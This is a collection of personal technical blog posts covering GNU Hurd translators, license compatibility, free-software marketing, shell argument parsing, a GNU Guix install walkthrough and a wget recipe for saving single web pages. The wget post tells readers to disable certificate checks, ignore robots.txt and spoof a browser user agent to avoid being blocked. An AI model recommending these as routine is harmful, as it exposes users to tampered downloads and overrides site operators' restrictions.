The filesystem implements stuff like Gnome VFS (gvfs) and KDE network transparency on the filesystem level, so those are available for all programs. And you can add a new filesystem as a simple user, just as if you’d write into a file “instead of this node, show the filesystem you get by interpreting file X with filesystem Y” (this is what you actually do when setting a translator but not yet starting it (passive translator)).

One practical advantage of this is that the following works:

settrans -a ftp\: /hurd/hostmux /hurd/ftpfs /
dpkg -i ftp://ftp.gnu.org/path/to/*.deb

This installs all deb-packages in the folder path/to on the FTP server. The shell sees normal directories (beginning with the directory “ftp:”), so shell expressions just work.

You could even define a Gentoo mirror translator (settrans mirror\: /hurd/gentoo-mirror), so every program could just access mirror://gentoo/portage-2.2.0_alpha31.tar.bz2 and get the data from a mirror automatically: wget mirror://gentoo/portage-2.2.0_alpha31.tar.bz2

unionmount as user

Or you could add a unionmount translator to root which makes writes happen at another place. Every user is able to make a readonly system readwrite by just specifying where the writes should go. But the writes only affect their own view of the filesystem.
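
As a rough sketch of the same idea, using the unionfs translator rather than the unionmount feature itself (paths are hypothetical):

# merge two directories into a single view; as an active translator it
# only changes my own view of the filesystem and needs no special rights
settrans -a ~/merged /hurd/unionfs ~/dir-a ~/dir-b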

persistent translators, started when needed

Starting a network process is done by a translator, too: The first time something accesses the network card, the network translator starts up and actually provides the device. This replaces most initscripts in the Hurd: Just add a translator to a node, and the service will persist over restarts.
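
To see what is recorded on a node, showtrans prints the stored passive translator; a small example, assuming the standard pfinet socket node:

# print the passive translator command line stored on the node (if any)
showtrans /servers/socket/2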

It’s a surprisingly simple concept, which reduces the complexity of many basic tasks needed for desktop systems.

And at its most basic level, Hurd is a set of protocols for messages which allow using the filesystem to coordinate and connect processes (along with helper libraries to make that easy).

add permissions at runtime (capabilities)

Also it adds POSIX compatibility to Mach while still providing access to the capabilities-based access rights underneath, if you need them: You can give a process permissions at runtime and take them away at will. For example you can start all programs without permission to use the network (or write to any file) and add the permissions when you need them.

Unlike on Linux, you do not need to start privileged and drop the permissions you do not need (governed by the program which is run); instead you start as an unprivileged process and add the permissions you need (governed by an external process):

groups # → root
addauth -p $(ps -L) -g mail
groups # → root mail 

lightweight virtualization

And then there are subhurds (essentially lightweight virtualization which allows cutting off processes from other processes without the overhead of creating a virtual machine for each process). But that’s an entire post of its own…

Easy to test lowlevel hacking

And the fact that a translator is just a simple standalone program means that these can be shared and tested much more easily, opening up completely new options for lowlevel hacking, because it massively lowers the barrier of entry.

For example the current Hurd can use the Linux network device drivers and run them in userspace (via DDE), so you can simply restart them and a crashing driver won’t bring down your system.

subdividing memory management

And then there is the possibility of subdividing memory management and using different microkernels (by porting the Hurd layer, as partly done in the NetBSD port), but that is purely academic right now (search for Viengoos to see what it’s about).

Summary

So in short:

The translator system in the Hurd is a simple concept that makes many tasks easy, which are complex with Linux (like init, network transparency, new filesystems, …). Additionally there are capabilities (give programs only the access they need - adjusted at runtime), subhurds and (academic) memory management.

Best wishes,
Arne

PS: I decided to read flameeyes’ post as “please give me technical reasons to dispel my emotional impression”.

PPS: If you liked this post, it would be cool if you’d flattr it: Flattr this

PPPS: Additional information can be found in Gaël Le Mignot’s talk notes, in niches for the Hurd and the GNU Hurd documentation pages.

P4S: This post is also available in the Hurd Staging Wiki.

(A)GPL as hack on a Python-powered copyright system

AGPL is a hack on copyright, so it has to use copyright, else it would not compile/run.

All the GPL licenses are a hack on copyright. They insert a piece of legal code into copyright law to force it to turn around on itself.

You run that on the copyright system, and it gives you code which can’t be made unfree.

To be able to do that, it has to be written in copyright language (else it could not be interpreted).

my_code = "<your code>"

def AGPL ( code ): 
    """
    >>> is_free ( AGPL ( code ) )
    True
    """
    return eval (
        transform_to_free ( code ) )

copyright ( AGPL ( my_code ) )

You pass “AGPL ( code )” to the copyright system, and it ensures the freedom of the code.

The transformation means that I am allowed to change your code, as long as I keep the transformation, because copyright law sees only the version transformed by AGPL, and that stays valid.

Naturally both AGPL definition and the code transformed to free © must be ©-compatible. And that means: All rights reserved. Else I could go in and say: I just redefine AGPL and make your code unfree without ever touching the code itself (which is initially owned by you by the laws of ©):

def AGPL ( code ): 
    """ 
    >>> is_free ( AGPL ( code ) )
    False
    """
    return eval (
        transform_to_mine ( code ) )

In this Python-powered copyright-system, I could just define this after your definition but before your call to copyright(), and all calls to AGPL ( code ) would suddenly return code owned by me.

Or you would have to include another way of defining which exact AGPL you mean. Something like “AGPL, but only the versions with the sha1 hashes AAAA BBBB and AABA”. cc tries to use links for that, but what do you do if someone changes the DNS resolution to point creativecommons.org to allmine.com? Whose DNS server is right, then - legally speaking?

In short: AGPL is a hack on copyright, so it has to use copyright, else it would not compile/run.

Are there 10x programmers?

→ An answer I wrote to this question on Quora.

Software Engineering: What is the truth of 10x programmers?
Do they really exist?…

Let’s answer the other way round: I once had to take heavy anti-histamines for three weeks. My mind was horribly hazy from that, and I felt awake only about two hours per day. However I spent every day working on a matrix multiplication problem.

It was three weeks of failure, because I just could not grasp the problem. I was unable to hold it in my mind.

Then I could finally drop the anti-histamine.

On the first day I solved the problem on my way to buy groceries. On the second day I planned the implementation while walking for two hours. On the third day I finished the program.

This taught me to accept it when people don’t manage to understand things I understand: I know that the brain can actually have different paces and that complexity which feels easy to me might feel infeasible for others. It sure did feel that way to me while I took the anti-histamines.

It also taught me to be humble: There might be people to whom my current state of mind feels like taking anti-histamines felt to me. I won’t be able to even grasp the patterns they see, because they can use another level of complexity.

To get a grasp of the impact, I ask myself a question: How would an alien solve problems who can easily keep 100 things in its mind — instead of the 4 to 7 which is the rough limit for humans?

BY-SA and GPL: creativecommons closed the chasm in the sharealike/copyleft community

This is the biggest news item for free culture and free software in the past 5 years: The creativecommons attribution sharealike license is now one-way compatible with the GPL — see the message from creativecommons and from the Free Software Foundation.

Some license compatibility legalese might sound small, but the impact of this is hard to overestimate.

(I’ll now revise some of my texts about licensing — CC BY-SA got a major boost in utility because it no longer excludes usage in copyleft documents which need the source to have a defended sharealike clause)

Communicating your project: honest marketing for free software projects

You have an awesome project, but you see people reach for inferior tools? There are people using your project, but you can’t reach the ones you care about? Read on for a way to ensure that your communication doesn’t ruin your prospects but instead helps your project to shine.

Communicating your project is an essential step for getting the users you want. Here I summarize my experience from working on several different projects including KDE (where I learned the basics of PR - yay, sebas!), the Hurd (where I could really make a difference by improving the frontpage and writing the Month of the Hurd), Mercurial (where I practiced minimally invasive PR) and 1d6 (my own free RPG where I see how much harder it is to do PR, if the project to communicate is your own).

Since voicing the claim that marketing is important often leads to discussions with people who hate marketing of any kind, I added an appendix with an example which illustrates nicely what happens when you don’t do any PR - and what happens if you do PR of the wrong kind.

If you’re pressed for time and want the really short form, just jump to the questionnaire.

What is good marketing?

Before we jump directly to the guide, there is an important term to define: Good marketing. That is the kind of marketing we want to do.

The definition I use here is this:

Good marketing ensures that the people to whom a project would be useful learn about the project.

and

Good marketing starts with the existing strengths of a project and finds people to whom these strengths are useful.

Thus good marketing does not try to interfere with the greater plan of the project, though it might identify some points where a little effort can make the project much more interesting to users. Instead it finds users to whom the project as it is can be useful - and ensures that these know about the project.

Be fair to competitors, be honest to users, put the project goals before generic marketing considerations.

As such, good marketing is an interface between the project and its (potential) users.

How to communicate your project?

This guide depends on one condition: Your project already has at least one area in which it excels over other projects. If that isn’t the case, please start by making your project useful to at least some people.

The basic way for communicating your project to its potential users always follows the same steps.

To make this text easier to follow, I’ll intersperse it with examples from the latest project where I did this analysis: GNU Guile: The GNU Ubiquitous Intelligent Language for Extensions. Guile provides a nice example, because its mission is clearly established in its name and it has lots of backing, but up until our discussion it actually had a Wikipedia page which was unappealing to the point of being hostile towards Guile itself.

To improve the communication of our project, we first identify our target groups.

Who are our Target Groups?

To do so, we begin by asking ourselves who would profit from our project:

  • What can we do well and how do we compare to others?
  • To whom would we already be useful or interesting if people knew about our strengths?
  • To whom are we already the best option?

Try to find about 3 groups of people and give them names which identify them. Those are the people we must reach to grow on the short term.

In the next step, we ask ourselves whom we want or need as users to fulfill our mission (our long-term goal):

  • Where do we want to get? What is our goal? (do we have a mission statement?)
  • Whom do we need to get there?
  • Whom do we want as users? Those shape us as they take part in the development - either as users or as fellow developers.

Again try to find about 3 groups of people and give them names which identify them. Those are the people we must reach to achieve our longterm goal. If while writing this down you find that one of the already identified groups which we could reach would actually detract from our goal, mark them. If they aren’t direly needed, we would do best to avoid targeting them in our communication, because they will hinder us in our longterm progress: They could become a liability which we cannot get rid of again.

Now we have about 6 target groups: Those are the people who should know about our project, either because they would benefit from it for pursuing their goals, or because we need to reach them to achieve our own goals. We now need to find out which kind of information they actually need or search for.

Example: Target Groups for Guile

GNU Guile is called The GNU Ubiquitous Intelligent Language for Extensions. So its mission is clear: Guile wants to become the de-facto standard language for extending programs - at least within the GNU project.

For whom are we already useful or interesting? Name them as Target-Groups.
  1. Schemer: Wants to see what GNU Scheme can do.
  2. Extender: GNU enthusiast wants to extend an existing program with a scripting language.
  3. Learner: Free Software enthusiast thinks about using Guile to learn programming
  4. Project-Starter: Experienced Programmer wants to start a new project.
  5. 1337: Programmer wants the coolness-factor.
  6. Emacser: Emacs users want to see what the potential future of Emacs would hold.
Whom do we want as users on the long run? Name them as Target-Groups.
  1. GNU-folk: All GNU developers.

What could they ask?

This part just requires thinking ourselves into the role of each of the target groups. For each of the target groups, ask yourself:

What would you want to know, if you were to read about our project?

As result of this step, we have a set of answers. Judge them on their strengths: Would these answers make you want to invest time to test our project? If not, can we find a better answer?

Example: Questions for the Target-Groups of Guile

  1. Schemer: What can guile do better than other Schemes?
  2. Extender: What does Guile offer my program? Why Guile and not Python/Lua?
  3. Learner: How easy and how powerful is Guile Scheme? Why Guile and not Python?
  4. Starter: What’s the advantage of starting my advanced project with guile?
  5. 1337: Why is guile cool?
  6. Emacser: What does Guile offer for Emacs?
  7. GNU-folk: What does Guile offer my program? (Being a GNU package is a distinct advantage, so there is less competition by non-GNU languages)

Whose wishes can we fulfill?

If our answers for a given group are not yet strong enough, we cannot yet communicate our project convincingly to them. In that case it is best to postpone reaching out to that group, otherwise they could get a lasting weak image of our project which would make it harder to reach them when we have stronger answers at some point in the future.

Remove all groups whose wishes we cannot yet fulfill, or for whom we do not see ourselves as the best choice.

Example: Chosen Target-Groups

  1. Schemer: Guile is a solid implementation of Scheme. For a comparison, see An opinionated Guide to Scheme implementations.
  2. Extender: The guile manual offers a nicely detailed guide for extending a program with Guile. We’re a bit weak on the examples and existing extensions, though, especially on non-GNU platforms.
  3. Learner: There aren’t yet tutorials for learning to program in Guile, though there are tutorials for learning to write Scheme - and even one for understanding Scheme from the view of a Python user. But our project resources cannot yet adequately support people who cannot program at all, so we have to restrict ourselves to programmers who want to learn a new language.
  4. Starter: Guile has solid support for many unix-specific things, but it is not yet a complete project-publishing solution. So we have to restrict ourselves to targeting people who want to start a project which is mainly intended to be used in environments with proper package management (mostly GNU/Linux).
  5. 1337: Guile is explicitly named in the GNU Coding Standards. It doesn’t get much cooler than that - at least for a certain idea of cool. We can’t get the Java-1337s, but we can get the Free Software-1337s.
  6. Emacser: Guile provides foreign-function-call. If guile gets used as base for Emacs, Emacs users get direct access to all scheme functions, too - as well as real threading. And that’s pretty strong. Also Geiser provides solid Guile Scheme support in Emacs.
  7. GNU-folk: They are either extenders or project starters or learners, but additionally they want to know in which GNU projects they can use Guile.

Provide those answers!

Now we have answers for the target groups. When we now talk or write about our project, we should keep those target groups in mind.

You can make that arbitrarily complex, for example by trying to find out which of our target groups use which medium. But lets keep it simple:

Ensure that our website (and potentially existing wikipedia page) includes the information which matters to our target groups. Just take all the answers for all the target groups we can already reach and check whether the basic information contained in them is given on the front page of our website.

And if not, find ways to add it.

As next steps, we can make sure that the questions we found for the target groups not only get answered, but directly lead the target groups to actions: For example to start using our project.

Example: The new Wikipedia-Page of Guile

For Guile, we used this analysis to fix the Wikipedia page. The old version mainly talked about history and weaknesses (to the point of sounding hostile towards Guile), and aside from the latest release number, it was horribly outdated. And it did not provide the information our target groups required.

The current Wikipedia-Page of GNU Guile works much better - for the project as well as for the readers of the page. Just compare them directly and you’ll see quite a difference. But aside from sounding nicer, the new site also addresses the questions of our target groups. To check that, we now ask: Did we include information for all the potential user-groups?

  1. Schemers: Yepp (it’s Scheme and there’s a section on Guile Scheme).
  2. Extenders: Yepp (libguile)
  3. Learners: Not yet. We might need a syntax-section with some examples. But wikipedians do not like Howto-Like sections. Also the interpreter should get a notice.
  4. Project-Starters: Partly in the “core idea”-part in the section Guile Scheme. It might need one more paragraph showing advantages of Guile which make it especially suited for that.
  5. 1337s: It is the preferred extension system for the GNU Project. If you’re not that kind of 1337: The Macro-System is hygienic (no surprising side-effects).
  6. Emacs users: They got their own section.
  7. GNU-Folk: They have a section on Guile in make. We should add a list of GNU projects with Guile support.

So there you go: Not perfect, but most of the groups are covered. And this also ensures that the Wikipedia-page is more interesting to its readers: A clear win-win.

Further points

Additional points which we should keep in mind:

  • On the website, do all of our target groups quickly find their way to advanced information about their questions? This is essential to keep the ones interested who aren’t completely taken by the short answers.
  • What is a common negative misconception about our project? We need to ensure that we do not write anything which strengthens this misconception. Is there an existing strength, which we can show to counter the negative misconception?
  • Where do we want to go? Do we have a mission statement?

bab-com q: Arne Babenhauserheide’s Project Communication Questionnaire

  • For whom are we already useful or interesting? Name them as Target-Groups.

    • (1)
    • (2)
    • (3)
  • Whom do we want as users on the long run? Name them as Target-Groups.

    • (4)
    • (5)
    • (6)
  • What could the Target-Groups ask? What are their needs? Formulate them as questions.
    • (1)
    • (2)
    • (3)
    • (4)
    • (5)
    • (6)
  • Answer their questions.
    • (1)
    • (2)
    • (3)
    • (4)
    • (5)
    • (6)
  • Whose needs can we already fulfill well? For whom do we see ourselves as the best choice?
    • (1)
    • (2)
    • (3)
    • (4)
  • Ensure that our communication includes the answers to these questions (i.e. website, wikipedia page, talks, …), at least for the groups who are likely to use the medium on which we communicate!

Use bab-com to avoid bad-com ☺ - yes, I know this phrase is horrible, but it is catchy and that fits this article: you need catchy things

Note: The mission statement

The mission statement is a short paragraph in which a project defines its goal.

A good example is:

Our mission is to create a general-purpose kernel suitable for the GNU operating system, which is viable for everyday use, and gives users and programs as much control over their computing environment as possible. — GNU Hurd mission explained

Another example again comes from Guile:

Guile was conceived by the GNU Project following the fantastic success of Emacs Lisp as an extension language within Emacs. Just as Emacs Lisp allowed complete and unanticipated applications to be written within the Emacs environment, the idea was that Guile should do the same for other GNU Project applications. This remains true today. — Guile and the GNU project

Closely tied to the mission statement is the slogan: A catch-phrase which helps anchoring the gist of your project in your readers’ minds. Guile does not have that yet, but judging from its strengths, the following could work quite well for Guile 2.0 - though it falls short of Guile in general:

GNU Guile scripting: Use Guile Scheme, reuse anything.

Summary

We saw why it is essential to communicate the project to the outside, and we discussed a simple structure to check whether our way of communication actually fits our project’s strengths and goals.

Finding the communication strategy actually boils down to 3 steps:

  • Target those who would profit from our project or whom we need.
  • Check what they need to know.
  • Answer that.

Also a clear mission statement, slogan and project description help to make the project more tangible for readers. In this context, good marketing means to ensure that the right people learn about the real strengths of the project.

With that I’ll conclude this guide. Have fun and happy hacking!
— Arne Babenhauserheide


Appendix: Why communicating your project?

In free software we often think that quality is a guarantee for success. But in just the 10 years I have been using free software, I have seen my share of technically great projects succumb to inferior projects which simply reached more people and used that to build a dynamic which greatly outpaced the technically better product.

One example of that is the story of pkgcore and paludis. When portage, the package manager of Gentoo, grew too slow because it did ever more extensive tests, two teams set out to build a replacement.

One of the teams decided that the fault for the low performance lay in Python, the language used by portage. That team built a package manager in C++ and had --wonderfully-long-command-options without shortcuts (have fun typing), and you actually had to run it twice: Once to see what would get installed and then again to actually install it (while portage had had an --ask option for ages, with -a as shortcut). And it forgot all the work it had done in the previous run, so you could wait twice as long for the result. They also had wonderful Latin names, and they managed the feat of being even slower than portage, despite being written in C++. So their claim that C++ would be magically faster than Python was simply wrong (because they skipped analyzing the real performance bottlenecks). They called their program paludis.

Note: Nowadays paludis has a completely new commandline interface which actually supports short command options. That interface is called cave and looks sane.

The other team did a performance analysis and realized that the low performance actually lay with the filesystem: The portage tree, which holds the required information, contains about 30,000 ebuilds and almost 200,000 files in total, and portage accessed far more of those files than actually needed for resolving the dependencies needed to install the package. They picked Python as their language - just like portage. They used almost the same commandline options as portage, except for the places where functionality differed. And they actually got orders of magnitude faster than portage - so fast that their search command often finished in less than a second, while portage took over 10 seconds. They called their program pkgcore.

Both had more exact resolution of packages and could break cyclic dependencies and so on.

So, judging from my account of the quality, which project would you expect to succeed?

I sure expected pkgcore to replace portage within a few months. But this is not what happened. And as I see it in hindsight, the difference lay purely in PR.

The paludis team with their slow and hard-to-use program went all over the Gentoo forums claiming that Python is a horrible language and that a C++ program will kick portage any time. On their website they repeated their attacks against Python and claimed superiority at every step. And they gathered quite a few zealots. While actually being slower than portage. Eventually they rebranded paludis as just better and more correct, not faster. And they created their own distribution (exherbo) as direct rival of Gentoo. With a new, portage-incompatible package format. As if they had read the book on how not to be a friendly competitor.

The pkgcore team on the other hand focussed on good technology. They created the snakeoil library for high-performance Python code, but they were friendly about it and actually contributed back to portage where code could be shared. But their website was out of date, often not noting the newest release, and you actually had to run pmerge --help to see the most current commandline options (though you could simply guess them if you knew portage). And they got attacked by paludis zealots so much that this year the main developer finally abandoned the project: He told me on IRC that he had taken so much vitriol over the years that it simply wasn’t worth the cost anymore.

Update: About a year later someone else took over. Good code often survives the loss of its creator.

So, what can we learn from this? Technical superiority does not gain you anything, if you fail to convince people to actually use your project.

If you don't communicate your project, you don't get users. If you don’t get users, your chances of losing motivation are orders of magnitude higher than if you get users who support you.

And aggressive marketing works, even if you cannot actually deliver on your promises. Today they have a better user-interface and even short option-names. But even to date, exherbo has much fewer packages in its repositories than Gentoo. If the number of files is any measure, the 10,000 files in their special repositories are just about 5% of the almost 200,000 files portage holds. But they managed quite well to fragment the Gentoo user base - at least for some time. And their repeated pushes for new standards in the portage tree (EAPIs) created a constant pressure on pkgcore to adapt, which had the effect that nowadays pkgcore cannot install from the portage tree anymore (the search still works, though, and I still use it - I will curse mightily on the day they manage to also break that).

Update: Someone else took over and now pkgcore can install again.

So aggressive marketing and doing everything in the book of unfriendly competition might have allowed the paludis devs to gather some users and destroy the momentum of pkgcore, but it did not allow them to actually become a replacement of portage within Gentoo. Their behaviour alienated far too many people for that. So aggressive and unfriendly marketing is better than no marketing, but it has severe drawbacks which you will likely want to avoid.

If you use overly aggressive, unfriendly or dishonest communication tactics, you get some users, but if your users know their stuff, you won’t win the mindshare you need to actually make a difference.

If on the other hand you want to see communication done right, just take a look at KDE and Gnome nowadays. They cooperate quite well, and they compete on features and by improving their project so users can take an informed choice about the project they choose.

And their number of contributors steadily keeps growing.

So what do they do? Besides being technically great, it boils down to good marketing.

Conveniently merge a NEWS file without conflicts

Writing a NEWS file (a list of changes per version, targeted at end-users) significantly reduces the effort for doing a release: To write your release notes, just copy the latest entries from the NEWS file into a message. It is one of the gems in the GNU coding standards: Simple yet extremely useful. (For a detailed realization, refer to the Perl Specification for CPAN Changes files.)

However when you’re developing features in parallel, for example by using a pull-request workflow and requiring contributors to update the NEWS file, you will often run into merge conflicts. Resolving these takes time, though the resolution is trivial: Just use the lines from both heads.

To resolve the problem, you can set your version tracking system to use union-merge for NEWS files.


Mercurial

echo "
[merge-patterns]
# avoid bogus conflicts in NEWS files
NEWS = internal:union
" >> .hg/hgrc

(necessary for each contributor to avoid surprising users)

Git

echo "/NEWS merge=union" >> .gitattributes
git add .gitattributes
git commit -m "union-merge NEWS" .gitattributes

(committed, so it sticks, but might mislead contributors into missing genuine conflicts, because a contributor does not necessarily know about the setting)

Download one page from a website with all its prerequisites

Often I want to simply back up a single page from a website. Until now I always had half-working solutions, but today I found one solution using wget which works really well, and I decided to document it here. That way I won’t have to search for it again, and you, dear readers, can benefit from it, too ☺

Update 2020: You can also use the copyweb-script from pyFreenet: copyweb -d TARGET_FOLDER URL
Install via pip3 install --user pyFreenet3.

In short: This is the command:

wget --no-parent --timestamping --convert-links --page-requisites --no-directories --no-host-directories --span-hosts --adjust-extension --no-check-certificate -e robots=off -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4' [URL]

Optionally add --directory-prefix=[target-folder-name]

(see the meaning of the options and getting wget for some explanation)

That’s it! Have fun copying single sites! (but before passing them on, ensure that you have the right to do it)

Does this really work?

As a test, how about running this:

wget -np -N -k -p -nd -nH -H -E --no-check-certificate -e robots=off -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4' --directory-prefix=download-web-site http://draketo.de/english/download-web-page-with-all-prerequisites

(this command uses the short forms of the options)

Then test the downloaded page with firefox:

firefox download-web-site/download-web-page-with-all-prerequisites.html

Getting wget

If you run GNU/Linux, you likely already have it - and if not, then your package manager has it. GNU wget is one of the standard tools available everywhere.

Some information in the (sadly) typically terse style can be found on the wget website from the GNU project: gnu.org/s/wget.

In case you run Windows, have a look at Wget for Windows from the gnuwin32 project or at GNU Wget for Windows from eternallybored.

Alternatively you can get a graphical interface via WinWGet from cybershade.

Or you can get serious about having good tools and install MSYS or Cygwin - the latter gets you some of the functionality of a unix working environment on windows, including wget.

If you run MacOSX, either get wget via fink, homebrew or MacPorts, or follow the guide from osxdaily or the German guide from dirk (likely there are more guides - these two were just the first hits in Google).

The meaning of the options (and why you need them):

  • --no-parent: Only get this file, not other articles higher up in the filesystem hierarchy.
  • --timestamping: Only get newer files (don’t redownload files).
  • --page-requisites: Get all files needed to display this page.
  • --convert-links: Change files to point to the local files you downloaded.
  • --no-directories: Do not create directories: Put all files into one folder.
  • --no-host-directories: Do not create separate directories per web host: Really put all files in one folder.
  • --span-hosts: Get files from any host, not just the one with which you reached the website.
  • --adjust-extension: Add a .html extension to the file.
  • --no-check-certificate: Do not check SSL certificates. This is necessary if you’re missing one of the host certificates one of the hosts uses. Just use this. If people with enough power to snoop on your browsing would want to serve you a changed website, they could simply use one of the fake certifications authorities they control.
  • -e robots=off: Ignore robots.txt files which tell you to not spider and save this website. You are no robot, but wget does not know that, so you have to tell it.
  • -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4': Fake being an old Firefox to avoid blocking based on being wget.
  • --directory-prefix=[target-folder-name]: Save the files into a subfolder to avoid having to create the folder first. Without that options, all files are created in the folder in which your shell is at the moment. Equivalent to mkdir [target-folder-name]; cd [target-folder-name]; [wget without --directory-prefix]

Conclusion

If you know the required options, mirroring single pages from websites with wget is fast and easy.

Note that if you want to get the whole website, you can just replace --no-parent with --mirror.
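
As a sketch, a whole-site mirror could then look like this (the URL is a placeholder; the other options work as explained above):

wget --mirror --convert-links --page-requisites --adjust-extension \
     --no-check-certificate -e robots=off \
     -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4' \
     https://example.com/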

Happy Hacking!

Elegant commandline argument parsing on the shell

Parsing command line arguments on the shell is often done in an ad-hoc fashion, growing unwieldy as time goes by, but there are tools to make that elegant. Here’s a complete example.

I use this in the conf project (easy setup of autotools projects). It builds on the great solution by Adam Katz.

# outer loop to allow processing option arguments at the end
while test ! $# -eq 0; do
    # getopts loop, here you define the short options: 
    # h for -h, l: for -l <lang>. -: provides support for long-options.
    while getopts -- hl:-: arg "$@"; do
        case $arg in
            h ) ARG_HELP=true ;;
            l ) ARG_LANG="$OPTARG" ;;
            - ) LONG_OPTARG="${OPTARG#*=}"
                case "$OPTARG" in
                    help    ) ARG_HELP=true;;
                    lang=?* ) ARG_LANG="$LONG_OPTARG" ;;
                    # FIXME: using the same option twice (either both
                    # after the argument or both before it) gives the
                    # first, not the second value
                    lang*   ) ARG_LANG="${@:$OPTIND:1}" ; OPTIND=$(($OPTIND + 1));;
                    vcs=?*  ) ARG_VCS="$LONG_OPTARG" ;;
                    vcs*    ) ARG_VCS="${@:$OPTIND:1}" ; OPTIND=$(($OPTIND + 1));;
                    '' )      break ;; # "--" terminates argument
                                       # processing to allow giving
                                       # options for autogen.sh after
                                       # --
                    * )       echo "Illegal option --$OPTARG" >&2; exit 2;;
                esac;;
            \? ) exit 2 ;;  # getopts already reported the illegal
                            # option
        esac
    done
    shift $((OPTIND-1)) # remove parsed options and args from $@ list
    # reinitialize OPTIND to allow parsing again
    OPTIND=1
    # provide help output.
    if test x"${ARG_HELP}" = x"true"; then
        echo "${PROG} new [-h | --help] [-l | --lang <LANGUAGE>] [--vcs <VCS>] PROJECT_NAME"
        exit 0
    fi
    # get the argument
    if test x"${1}" = x"--"; then
        if test x"${PROJ}" = x""; then
            echo "Missing project name." >&2; exit 2
        else
            # nothing more to parse.
            # Remove -- from the remaining arguments
            shift 1
            break
        fi
    fi
    if test ! x"${1}" = x""; then
        PROJ="${1%/}" # without trailing slash
    fi
    # remove the argument, then continue the loop to allow putting
    # the options after the argument
    shift 1
done
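
For illustration, here are a few hypothetical invocations this parser accepts; the command name conf and the new subcommand are assumptions taken from the help string in the script above:

# options may come before or after the project name
conf new -l scheme myproject
conf new myproject --lang scheme
conf new --vcs hg myproject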

Additional explanation for this is available from Adam Katz (2015). I’m allowed to include it here, because every answer on Stackoverflow is licensed under creativecommons attribution sharealike (cc by-sa) and because cc by-sa is one-way compatible with the GPLv3.

# From Adam Katz, 2015: http://stackoverflow.com/users/519360/adam-katz
# Available at http://stackoverflow.com/a/28466267/7666
# License: cc by-sa: https://creativecommons.org/licenses/by-sa/3.0/
while getopts ab:c-: arg; do
  case $arg in
    a )  ARG_A=true ;;
    b )  ARG_B="$OPTARG" ;;
    c )  ARG_C=true ;;
    - )  LONG_OPTARG="${OPTARG#*=}"
         case $OPTARG in
           alpha    )  ARG_A=true ;;
           bravo=?* )  ARG_B="$LONG_OPTARG" ;;
           bravo*   )  echo "No arg for --$OPTARG option" >&2; exit 2 ;;
           charlie  )  ARG_C=true ;;
           alpha* | charlie* )
                       echo "No arg allowed for --$OPTARG option" >&2; exit 2 ;;
           '' )        break ;; # "--" terminates argument processing
           * )         echo "Illegal option --$OPTARG" >&2; exit 2 ;;
         esac ;;
    \? ) exit 2 ;;  # getopts already reported the illegal option
  esac
done
shift $((OPTIND-1)) # remove parsed options and args from $@ list

With this pattern and the practical example at the top you should be able to implement clean commandline parsing with ease.
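
For illustration, here are a few hypothetical invocations of a script built around the outer loop above (the script name ./new-project and the values are only placeholders, not taken from the conf project):

./new-project -l python myproject       # short option: ARG_LANG=python, PROJ=myproject
./new-project --lang=python myproject   # long option with = works the same way
./new-project myproject --lang python   # options may also follow the argument
./new-project --vcs hg --help           # sets ARG_VCS, prints the usage line and exits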

Happy Hacking!

GNU Guix in 5 minutes

So you get excited when you hear about surviving a power-outage during updates without a hitch and you want to give Guix a try — but woe, you only have 5 minutes of time?

Fear not, that’s enough to get it up and running — all the way to per-user environments and package installation as a non-privileged user!

The instructions here are from the official docs, specialized for a GNU Linux host and cut to what I need in a working system.

as user:

$ cd /tmp
$ wget ftp://alpha.gnu.org/gnu/guix/guix-binary-0.8.3.x86_64-linux.tar.xz

become root

$ sudo screen

unpack, install and set up Guix

# tar xf guix-binary-0.8.3.x86_64-linux.tar.xz 
# mv var/guix /var/ && mv gnu /
# ln -sf /var/guix/profiles/per-user/root/guix-profile ~root/.guix-profile

Create the build users as per Build-Environment-Setup:

# groupadd --system guixbuild
# for i in `seq -w 1 10`;
   do
      useradd -g guixbuild -G guixbuild           \
              -d /var/empty -s `which nologin`    \
              -c "Guix build user $i" --system    \
              guixbuilder$i;
   done

Run the daemon:

# ~root/.guix-profile/bin/guix-daemon --build-users-group=guixbuild

Switch to a second root window with CTRL-a c to adjust the PATH, allow substitutes from the Hydra build server, and to install and set locales (required since we’re installing an overlay, not a full distro).

# echo 'PATH="$HOME/.guix-profile/bin:$HOME/.guix-profile/sbin:${PATH}"' >> $HOME/.bashrc
# echo 'export LOCPATH=$HOME/.guix-profile/lib/locale'  >> $HOME/.bashrc
# source $HOME/.bashrc
# guix archive --authorize < ~root/.guix-profile/share/guix/hydra.gnu.org.pub
# guix package -i glibc-utf8-locales

Allow all users to use the guix command (as long as guix-daemon is running):

# mkdir -p /usr/local/bin
# cd /usr/local/bin
# ln -s /var/guix/profiles/per-user/root/guix-profile/bin/guix

Switch back to your regular user and provide the guix profile. Also install the locales (remember that the installation is really per-user, though users share the underlying packages if both install them). The per-user profile will be generated the first time you run guix package.

$ ln -sf /var/guix/profiles/per-user/$(whoami)/guix-profile ~/.guix-profile
$ echo 'export PATH="$HOME/.guix-profile/bin:$HOME/.guix-profile/sbin:${PATH}"' >> $HOME/.bashrc
$ echo 'export LOCPATH=$HOME/.guix-profile/lib/locale'  >> $HOME/.bashrc
$ source $HOME/.bashrc
$ guix package -i glibc-utf8-locales
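
Before the fun part, a quick sanity check can be worthwhile (a sketch — the exact version string depends on the tarball you downloaded):

$ type guix        # should resolve to /usr/local/bin/guix
$ guix --version   # e.g. guix (GNU Guix) 0.8.3
$ guix package -I  # list what is installed in your profile (just the locales so far)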

And now:

$ guix package -i guile-emacs --fallback
$ ~/.guix-profile/bin/emacs -Q

So you believed that to be only a pipe-dream, just like power-loss-resistant updates and functional packaging using the official GNU extension language? I was glad to be proven wrong, and I hope you’ll feel the same ☺ (though guile-emacs is still experimental, it already allows calling elisp functions directly from scheme)

Happy Hacking!

GnuPG/PGP signature, short explanation

»What is the .asc file?« This explanation is intended to be copied as-is into emails when someone asks about your signature.

The .asc file is a signature which can be used to verify that the email was really sent by me and wasn’t tampered with.[1] It can be verified with standard email security tools like Enigmail[2], Gpg4win[3] or MacGPG[4] - and other tools supporting OpenPGP[5].

Best wishes,
Arne

[1]: For further information on signatures see
    https://www.gnupg.org/gph/en/manual/x135.html

